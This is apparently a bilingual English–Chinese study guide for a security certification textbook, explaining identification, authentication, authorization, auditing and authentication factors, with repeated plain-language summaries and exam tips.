Providing an identity might entail typing a username, swiping a smartcard, speaking a phrase, or positioning your face, hand, or finger in front of a camera or in proximity of a scanning device. A core identification principle is that all subjects must have unique identities. Authentication verifies the subject's identity by comparing one or more factors against a database of valid identities, such as user accounts. The authentication information used to verify identity is private and needs to be protected. As an example, passwords are rarely stored in cleartext within a database. Instead, authentication systems store hashes of passwords in the authentication database.

Chapter 6, “Cryptography and Symmetric Key Algorithms,” covers hashing in more depth. Identification and authentication occur together as a single two-step process. Providing an identity is the first step, and providing the authentication information is the second step. Without both, a subject cannot gain access to a system. In contrast, imagine a user claims an identity (such as with a username of john.doe@sybex.com) but doesn't prove the identity (with a password). This username is for the employee named John Doe. However, if a system accepts

中文直译 / 整理

身份和访问管理系统的核心功能包括: 身份验证用户、系统、服务及其他主体,以确认其真实身份 授权这些主体尝试执行的操作 计费活动,通过维护审计跟踪 这三项核心功能共同构成了访问控制的AAA(或“三重A”)模型。 身份识别与验证策略 身份识别是主体声明或宣称其身份的过程。 主体必须向系统提供身份,以启动 验证、授权和计费流程。 提供身份可能包括输入用户名、刷智能卡、说出短语, 或将面部、手或手指置于摄像头前或扫描设备附近。 身份识别的核心原则是所 有主体都必须具有唯一身份。 身份验证通过将一个或多个因素与有效身份数据库(如用户账户)进行比较 来验证主体的身份。 用于验证身份的认证信息是私密的,需要受到保护。 例 如,密码很少以明文形式存储在数据库中。 相反,认证系统会在认证数据库 中存储密码的哈希值。 第6章,“加密与对称密钥算法”,更深入地介绍了哈希。 标识和身份验证作为单个两步过程一起发生。 提供身份是第一步,提供认证信 息是第二步。 缺少其中任何一步,主体都无法访问系统。 相反,想象一个用户声称了一个身份(例如使用用户名 john.doe@sybex.com), 但并未通过密码证明该身份。 此用户名属于员工约翰·多伊。

然而,如果系统仅接受

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 06 / PDF P922

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

the username without the password, it has no proof that the user is John Doe. Anyone who knows John's username can impersonate him. Each authentication technique or factor has benefits and drawbacks. Thus, it is important to evaluate each mechanism in the context of the environment where it is deployed. For example, a facility that processes Top Secret materials requires very strong authentication mechanisms. In contrast, authentication requirements for students within a classroom environment are significantly less. While identification and authentication methods authenticate people, they also authenticate devices and services.

The “Device Authentication” and “Service Authentication” sections, later in this chapter, explain devices and services in more depth. You can simplify identification and authentication by thinking about a username and a password. Users identify themselves with usernames and authenticate (or prove their identity) with passwords. Of course, there are many more identification and authentication methods, but this simplification helps you keep the terms clear. Comparing Subjects and Objects Access control addresses more than just controlling which users can access which files or services. It is about the relationships between entities (subjects and objects).

Access is the transfer of information from an object to a subject, which makes it important to understand the definition of both subject and object. Chapter 8, “Principles of Security Models, Design, and Capabilities,” covers subjects and objects in more depth. The following provides a short reminder: Subject A subject is an active entity that accesses a passive object to receive information from, or data about, an object. Subjects can be users, programs, processes, services, computers, or anything else that can access a resource. When authorized, subjects can modify objects. Object An object is a passive entity that provides information to active subjects.

Examples of objects are files, databases, computers, programs, processes, services, printers, and storage media.

中文直译 / 整理

用户名而不验证密码,就无法证明用户确实是约翰·多伊。 任何知道约翰用户 名的人都可以冒充他。 每种身份验证技术或因素都有其优缺点。 因此,重要的是根据其部署环境评估 每种机制。 例如,处理绝密材料的设施需要非常强大的身份验证机制。 相比之 下,教室环境中学生的身份验证要求则显著较低。 虽然身份识别和身份验证方法用于验证人员,但它们也用于验证设备和服务。 本章后续的“设备身份验证”和“服务身份验证”部分将更深入地介绍设备 和服务。 你可以通过思考用户名和密码来简化身份识别和身份验证。 用户使用 用户名标识自己,并使用密码进行身份验证(或证明其身份)。 当然,还 有许多其他身份识别和身份验证方法,但这种简化有助于你清晰区分这些 术语。 比较主体与客体 访问控制所涉及的不仅仅是控制哪些用户可以访问哪些文件或服务。 它关乎实 体(主体和客体)之间的关系。 访问是指信息从客体向主体的传输,因此理解 主体和客体的定义至关重要。 第8章“安全模型、设计与能力的原则”将更深入 地介绍主体和客体。 以下内容提供简要提醒: 主题 A 主体 是一个主动实体,它访问一个被动对象以获取有关该对象的信息或数 据。

主体可以是用户、程序、进程、服务、计算机或任何其他能够访问资源的实 体。 经授权后,主体可以修改对象。 对象 一个 对象 是一个被动实体,为活跃的主体提供信息。 对象的例子包括 文件、数据库、计算机、程序、进程、服务、打印机和存储介质。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
学习单元 07 / PDF P923

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

You can often simplify the access control topics by substituting the word user for subject and the word file for object. For example, instead of a subject accesses an object, you can think of it as a user accesses a file. However, it's also important to remember that subjects include more than users and that objects include more than just files. You may have noticed that some examples, such as programs, services, and computers, are listed as both subjects and objects. This is because the roles of subject and object can switch back and forth. In many cases, when two entities interact, they perform different functions.

Sometimes they may be requesting information and other times providing information. The key difference is that the subject is always the active entity that receives information about, or data from, the passive object. The object is always the passive entity that provides or hosts the information or data. As an example, consider a common web application that provides dynamic web pages to users. Users query the web application to retrieve a web page, so the application starts as an object. The web application then switches to a subject role as it queries the user's computer to retrieve a cookie and then queries a database to retrieve information about the user based on the cookie.

Finally, the application switches back to an object as it sends dynamic web pages back to the user. Registration, Proofing, and Establishment of Identity Within an organization, new employees prove their identity with appropriate documentation during the hiring process. Acceptable documentation for inperson identity proofing includes using physical documents such as a passport, driver's license, birth certificate, and more. This documentation establishes the identity of the new employee for the employer. After verifying the documents are authentic, employees within a human resources (HR) department begin the registration process.

This process can be as simple as creating an account for the new employee and having the new employee set a password. If the organization uses more secure authentication methods, such as biometrics, the registration process is more complex. For example, if the organization uses fingerprinting as a biometric method for

中文直译 / 整理

您通常可以通过将 用户 替换 主体,并将 文件 替换 对象 来简化访问控 制主题。 例如,与其说 主体访问对象,您可以将其理解为 用户访问文件。 然而,同样重要的是要记住,主体不仅包括用户,对象也不仅限于文件。 您可能已经注意到,某些示例(如程序、服务和计算机)既被列为subject,也 被列为object。 这是因为subject和object的角色可以相互切换。 在许多情况下, 当两个实体相互作用时,它们会执行不同的功能:有时它们请求信息,有时则 提供信息。 关键区别在于,subject始终是主动实体,负责接收有关被动 object的信息或数据; 而object始终是被动实体,提供或托管信息或数据。 以一个常见的Web应用程序为例,该程序向用户提供动态网页。 用户查询 Web应用程序以获取网页,因此应用程序最初作为object。 随后,应用程序切 换为subject角色,查询用户的计算机以获取cookie,再根据该cookie查询数 据库以获取有关用户的信息。 最后,应用程序再次切换回object角色,将动态 网页发送回用户。 注册、身份验证与身份建立 在组织内,新员工在招聘过程中通过适当的文件证明其身份。

适用于现场身份 验证的可接受文件包括使用护照、驾照、出生证明等实体文件。 这些文件用于 为雇主确立新员工的身份。 在验证文件真实无误后,人力资源(HR)部门的员工开始注册流程。 此流程可 能很简单,例如为新员工创建账户并让其设置密码。 如果组织使用更安全的认 证方式,如生物识别,则注册流程更为复杂。 例如,如果组织将指纹识别作为 生物识别方法用于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

程序:程序是一步一步怎么做。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Step-by-step、SOP 常对应 procedure。

证书不是密钥本身,而是身份与公钥的可信绑定。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
程序 程序是一步一步怎么做。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
身份 身份是主体在系统中的标识。
学习单元 08 / PDF P924

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

authentication, registration includes capturing the new employee's fingerprints. Online organizations often use knowledge-based authentication (KBA) for identity proofing of someone new, such as a new customer. For example, if you create an online savings account, the bank will ask you a series of multiple-choice or fill-in-the-blank questions that only you should know. Here are a few examples: Which of the following vehicles have you recently purchased? How much is your car payment? How much is your mortgage (or rental) payment? Have you lived at any of the following addresses? What is your driver's license number?

The organization queries independent and authoritative sources, such as credit bureaus or government agencies, before creating these questions. It also gives users a limited amount of time to answer the questions. Some organizations use a cognitive password (also known as security questions) when a known user is trying to change a password. Authentication systems collect the answers to these questions during the account's initial registration, but they can be collected or modified later. As an example, the subject might see the following questions when creating an account: What is your favorite sport? What is the color of your first car? What is the name of your first pet?

What is the name of your first boss? What is your mother's maiden name? What is the name of your best friend in grade school? Later, the system uses these questions for authentication. If the user answers all the questions correctly, the system authenticates the user. Cognitive passwords often assist with password management using self-service password reset systems or assisted password reset systems. For example, if users forget their original password, they can ask for help. The password

中文直译 / 整理

认证,注册过程包括采集新员工的指纹。 在线机构通常使用基于知识的认证(KBA)来验证新用户的身份,例如新客 户。 例如,如果您开设在线储蓄账户,银行会向您提出一系列仅您本人应知 晓的多项选择题或填空题。 以下是一些示例: 以下哪些车辆您最近购买过? 您的汽车月供是多少? 您的房贷(或房租)月供是多少? 您是否曾经居住在以下地址? 您的驾驶证号码是多少? 该组织在创建这些问题之前,会向信用局或政府机构等独立且权威的来源进 行查询。 它还为用户提供有限的时间来回答这些问题。 一些组织在已知用户尝试更改密码时,会使用认知密码(也称为安全问题)。 身份验证系统在账户初始注册期间收集这些问题的答案,但也可以在之后收集 或修改。 例如,用户在创建账户时可能会看到以下问题: 您最喜欢的运动是什么? 您的第一辆车是什么颜色的? 您的第一只宠物叫什么名字? 您的第一位老板叫什么名字? 你母亲的婚前姓氏是什么? 你小学时最好的朋友叫什么名字? 之后,系统会使用这些问题进行身份验证。 如果用户正确回答了所有问题,系 统将验证用户身份。 认知密码通常有助于使用自助密码重置系统或协助密码重 置系统进行密码管理。

例如,如果用户忘记了原始密码,他们可以寻求帮助。 密码

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
学习单元 09 / PDF P925

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

management system then challenges the user with one or more of these cognitive password questions, presumably known only by the user. One of the flaws associated with cognitive passwords is that the information is often available on social media sites or with internet searches. If a user includes some or all of the same information in an online profile, attackers may use the information to change the user's password. The National Institute of Standards and Technology's NIST SP 800-63B—Digital Identity Guidelines: Authentication and Life Cycle Management discourages using these static questions.

Authorization and Accounting Two additional security elements in an access control system are authorization and accounting: Authorization Subjects are granted access to objects based on proven identities. For example, administrators grant users access to files based on the user's proven identity. Accounting Users and other subjects can be held accountable for their actions when auditing is implemented. Auditing tracks subjects and logs when they access objects, creating an audit trail in one or more audit logs. For example, auditing can record when a user reads, modifies, or deletes a file. Auditing provides accountability.

Additionally, assuming the user has been properly authenticated, audit logs provide nonrepudiation. The user cannot believably deny doing something that is recorded in the audit logs. An effective access control system requires strong identification and authentication mechanisms, in addition to authorization and accountability elements. Subjects have unique identities and prove their identity with authentication. Administrators grant access to subjects based on their identities, providing authorization. Logging user actions based on their proven identities provides accountability. In contrast, if users didn't need to log on with credentials, then all users would be anonymous.

It isn't possible to restrict authorization to specific

中文直译 / 整理

管理系统随后会向用户提出一个或多个这些认知密码问题,这些问题据称只 有用户本人知晓。 认知密码的一个缺陷是,相关信息通常可在社交媒体网站或互联网搜 索中获得。 如果用户在在线档案中包含部分或全部相同信息,攻击者可能 利用这些信息更改用户的密码。 美国国家标准与技术研究院(NIST)的 NIST SP 800‑63B—数字身份指南:认证与生命周期管理建议不要使用这 些静态问题。 授权与计费 访问控制系统中的另外两个安全元素是 授权 和 计费: 授权 主体根据经过验证的身份被授予对对象的访问权限。 例如,管理员根据 用户的经过验证的身份授予用户对文件的访问权限。 计费 当实施审计时,用户和其他主体可对其行为负责。 审计跟踪主体并记录其访 问对象的时间,从而在一份或多个审计日志中创建审计轨迹。 例如,审计可以记 录用户读取、修改或删除文件的时间。 审计提供可追责性。 此外,假设用户已得到适当的身份验证,审计日志可提供不可否认性性。 用户 无法合理否认审计日志中记录的行为。 有效的访问控制系统需要强大的身份识别和认证机制,以及授权和问责元素。 主体具有唯一身份,并通过认证证明其身份。 管理员根据主体的身份授予访 问权限,提供授权。

基于已验证的身份记录用户操作,可实现问责。 相反,如果用户无需使用凭据登录,则所有用户都将为匿名状态。 无法对特定

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
学习单元 10 / PDF P926

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

users if everyone is anonymous. Logging could still record events, but it would not be able to identify which users performed any actions. Authorization Authorization indicates who is trusted to perform specific operations. If the action is allowed, the subject is authorized; if disallowed, the subject is not authorized. As a simple example, if a user attempts to open a file, the authorization mechanism checks to ensure that the user has at least read permission on the file. It's important to realize that just because users or other entities can authenticate to a system, that doesn't mean they have access to anything and everything.

Instead, subjects are authorized to access specific objects based on their proven identity. The process of authorization ensures that the requested activity or object access is possible based on the privileges assigned to the subject. Administrators grant users only the privileges they need to perform their jobs following the principle of least privilege. Identification and authentication are “all-or-nothing” aspects of access control. Either a user's credentials prove a professed identity, or they don't. In contrast, authorization occupies a wide range of variations.

For example, a user may be able to read a file but not delete it, or they may be able to print a document but not alter the print queue. Accounting Auditing, logging, and monitoring provide accounting services by ensuring that subjects can be held accountable for their actions. Auditing is the process of tracking and recording subject activities within logs. Logs typically record who took an action, when and where the action was taken, and what the action was. One or more logs create an audit trail that researchers or investigators can use to reconstruct events and identify security incidents.

When they review audit trails' contents, they can provide evidence to hold people accountable for their actions, such as violating security policy rules. These audit trails also help verify user compliance with policies. There's a subtle but important point to stress about accountability. Accountability relies on effective identification and authentication, but it does not require effective authorization. In other words, after identifying and authenticating users, accountability mechanisms such as audit logs can track

中文直译 / 整理

用户进行授权限制。 日志记录仍可记录事件,但无法识别哪些用户执行了任 何操作。 授权 授权指示哪些主体被信任执行特定操作。 如果允许该操作,则主体被授权; 如果禁止该操作,则主体未被授权。 作为一个简单的例子,当用户尝试打开 一个文件时,授权机制会检查该用户是否至少具有对该文件的读取权限。 重要的是要认识到,即使用户或其他实体能够向系统进行身份验证,也不意味 着他们可以访问一切。 相反,主体根据其已验证的身份被授权访问特定对象。 授权过程确保所请求的活动或对象访问基于分配给主体的权限是可行的。 管理 员遵循最小权限原则,仅授予用户执行其工作所需的权限。 标识和身份验证是访问控制中的“全有或全无”方面:要么用户的凭据证明了 其所声称的身份,要么没有。 相比之下,授权则涵盖广泛的变化。 例如,用户 可能可以读取文件但不能删除它,或者可以打印文档但不能修改打印队列。 会计 审计、日志记录和监控通过确保主体对其行为负责来提供会计服务。 审计是跟 踪并记录主体活动在日志中的过程。 日志通常记录谁采取了行动、行动发生的 时间和地点以及行动的内容。 一个或多个日志共同构成一个审计轨迹,研究人 员或调查人员可利用它来重建事件并识别安全事件。

当他们审查审计轨迹的内 容时,可以提供证据以追究相关人员违反安全策略规则的责任。 这些审计轨迹 还有助于验证用户对策略的合规性。 关于问责制,有一个微妙但重要的点需要强调。 问责制依赖于有效的身份识别 和身份验证,但并不需要有效的授权。 换句话说,在识别和验证用户后,问责 机制(如审计日志)可以追踪

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 11 / PDF P927

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

their activity, even when they try to access resources that they aren't authorized to access. Authentication Factors Overview There are three primary authentication factors: Something You Know The something you know factor of authentication includes memorized secrets such as a password, personal identification number (PIN), or passphrase. Older documents refer to this as a Type 1 authentication factor. Something You Have The something you have factor of authentication includes physical objects that a user possesses and can help them provide authentication. Examples include a smartcard, hardware token, smartphone running an authentication application, or Universal Serial Bus (USB) drive.

Older documents refer to this as a Type 2 authentication factor. Something You Are The something you are factor of authentication uses physical characteristics of a person and is based on biometrics. Examples in the something you are category include fingerprints, face scans, retina patterns, iris patterns, palm scans, and voice pattern recognition. Older documents refer to this as a Type 3 authentication factor. Single-factor authentication uses only one authentication factor. Multifactor authentication uses two or more authentication factors. These types are progressively stronger when implemented correctly, with something you know being the weakest and something you are the strongest.

In other words, passwords are the weakest form of authentication, and a fingerprint is stronger than a password. However, attackers can still bypass some biometric authentication factors. For example, an attacker can create a duplicate, or counterfeit, fingerprint on a gummy bear candy and fool a fingerprint reader. In addition to the three primary authentication factors, attributes are sometimes used for additional authentication. These include the following: Somewhere You Are The somewhere you are factor identifies a subject's location based on a specific computer or device, a geographic location identified by an Internet Protocol (IP) address, or a phone number identified by Caller ID.

Controlling access by physical location forces a subject to be present somewhere. Geolocation technologies can identify a user's location based on the IP address, and some authentication systems use geolocation.

中文直译 / 整理

他们的活动,即使他们试图访问没有授权的资源。 认证因素概述 主要有三种认证因素: 你知道的东西 你知道的东西 认证因素包括记忆型秘密,例如密码、个人识别码 (PIN)或口令。 较旧的文档将其称为 Type1认证因素。 你拥有的东西 你拥有的东西 认证因素包括用户所持有的物理对象,可帮助其完 成认证。 示例包括智能卡、硬件令牌、运行认证应用程序的智能手机或通用串 行总线(USB)驱动器。 较旧的文档将其称为 Type2认证因素。 你自身的特征 你自身的特征 认证因素利用个人的生理特征,基于生物识别技术。 属于“你自身的特征”类别的示例包括指纹、面部扫描、视网膜图案、虹膜图案、 掌纹和语音模式识别。 较旧的文档将其称为 Type3认证因素。 单因素认证仅使用一种认证因素,多因素认证则使用两种或两种以上的认证因素。 这些类型在正确实现时依次更强,其中你所知道的信息最弱,而你自身的特征 最强。 换句话说,密码是最弱的认证形式,而指纹比密码更强。 然而,攻击者 仍可能绕过某些生物识别认证因素。 例如,攻击者可以在一颗软糖上制作一个 指纹副本或伪造指纹,从而欺骗指纹识别器。

除了三种主要的认证因素外,有时还会使用属性进行额外认证。 这些包括以下内 容: 你所在的位置 "你所在的位置" 因素根据特定计算机或设备、通过互联网协议 (IP)地址识别的地理位置,或通过来电显示识别的电话号码来确定主体的位 置。 通过物理位置控制访问,强制主体必须出现在某个地方。 地理定位技术可 以根据IP地址识别用户的位置,一些身份验证系统也使用地理定位。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 12 / PDF P928

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Somewhere You Aren't Many IAM systems use geolocation technologies to identify suspicious activity. For example, imagine that a user typically logs on with an IP address in Virginia Beach. If the IAM detects a user trying to log on to the same account from India, it can block the access even if the user has the correct username and password. This isn't 100 percent reliable, though. A dedicated overseas attacker can use online virtual private network (VPN) services to change the IP address used to connect with an online server. Context-Aware Authentication Many mobile device management (MDM) systems use context-aware authentication to identify mobile device users.

It can identify multiple attributes such as the user's location, the time of day, and the mobile device. Organizations frequently allow users to access a network with a mobile device, and MDM systems can detect details on the device when a user attempts to log on. If the user meets all the requirements (location, time, and type of device in this example), it allows the user to log on using the other methods, such as with a username and password. Many mobile devices support the use of gestures or finger swipes on a touchscreen.

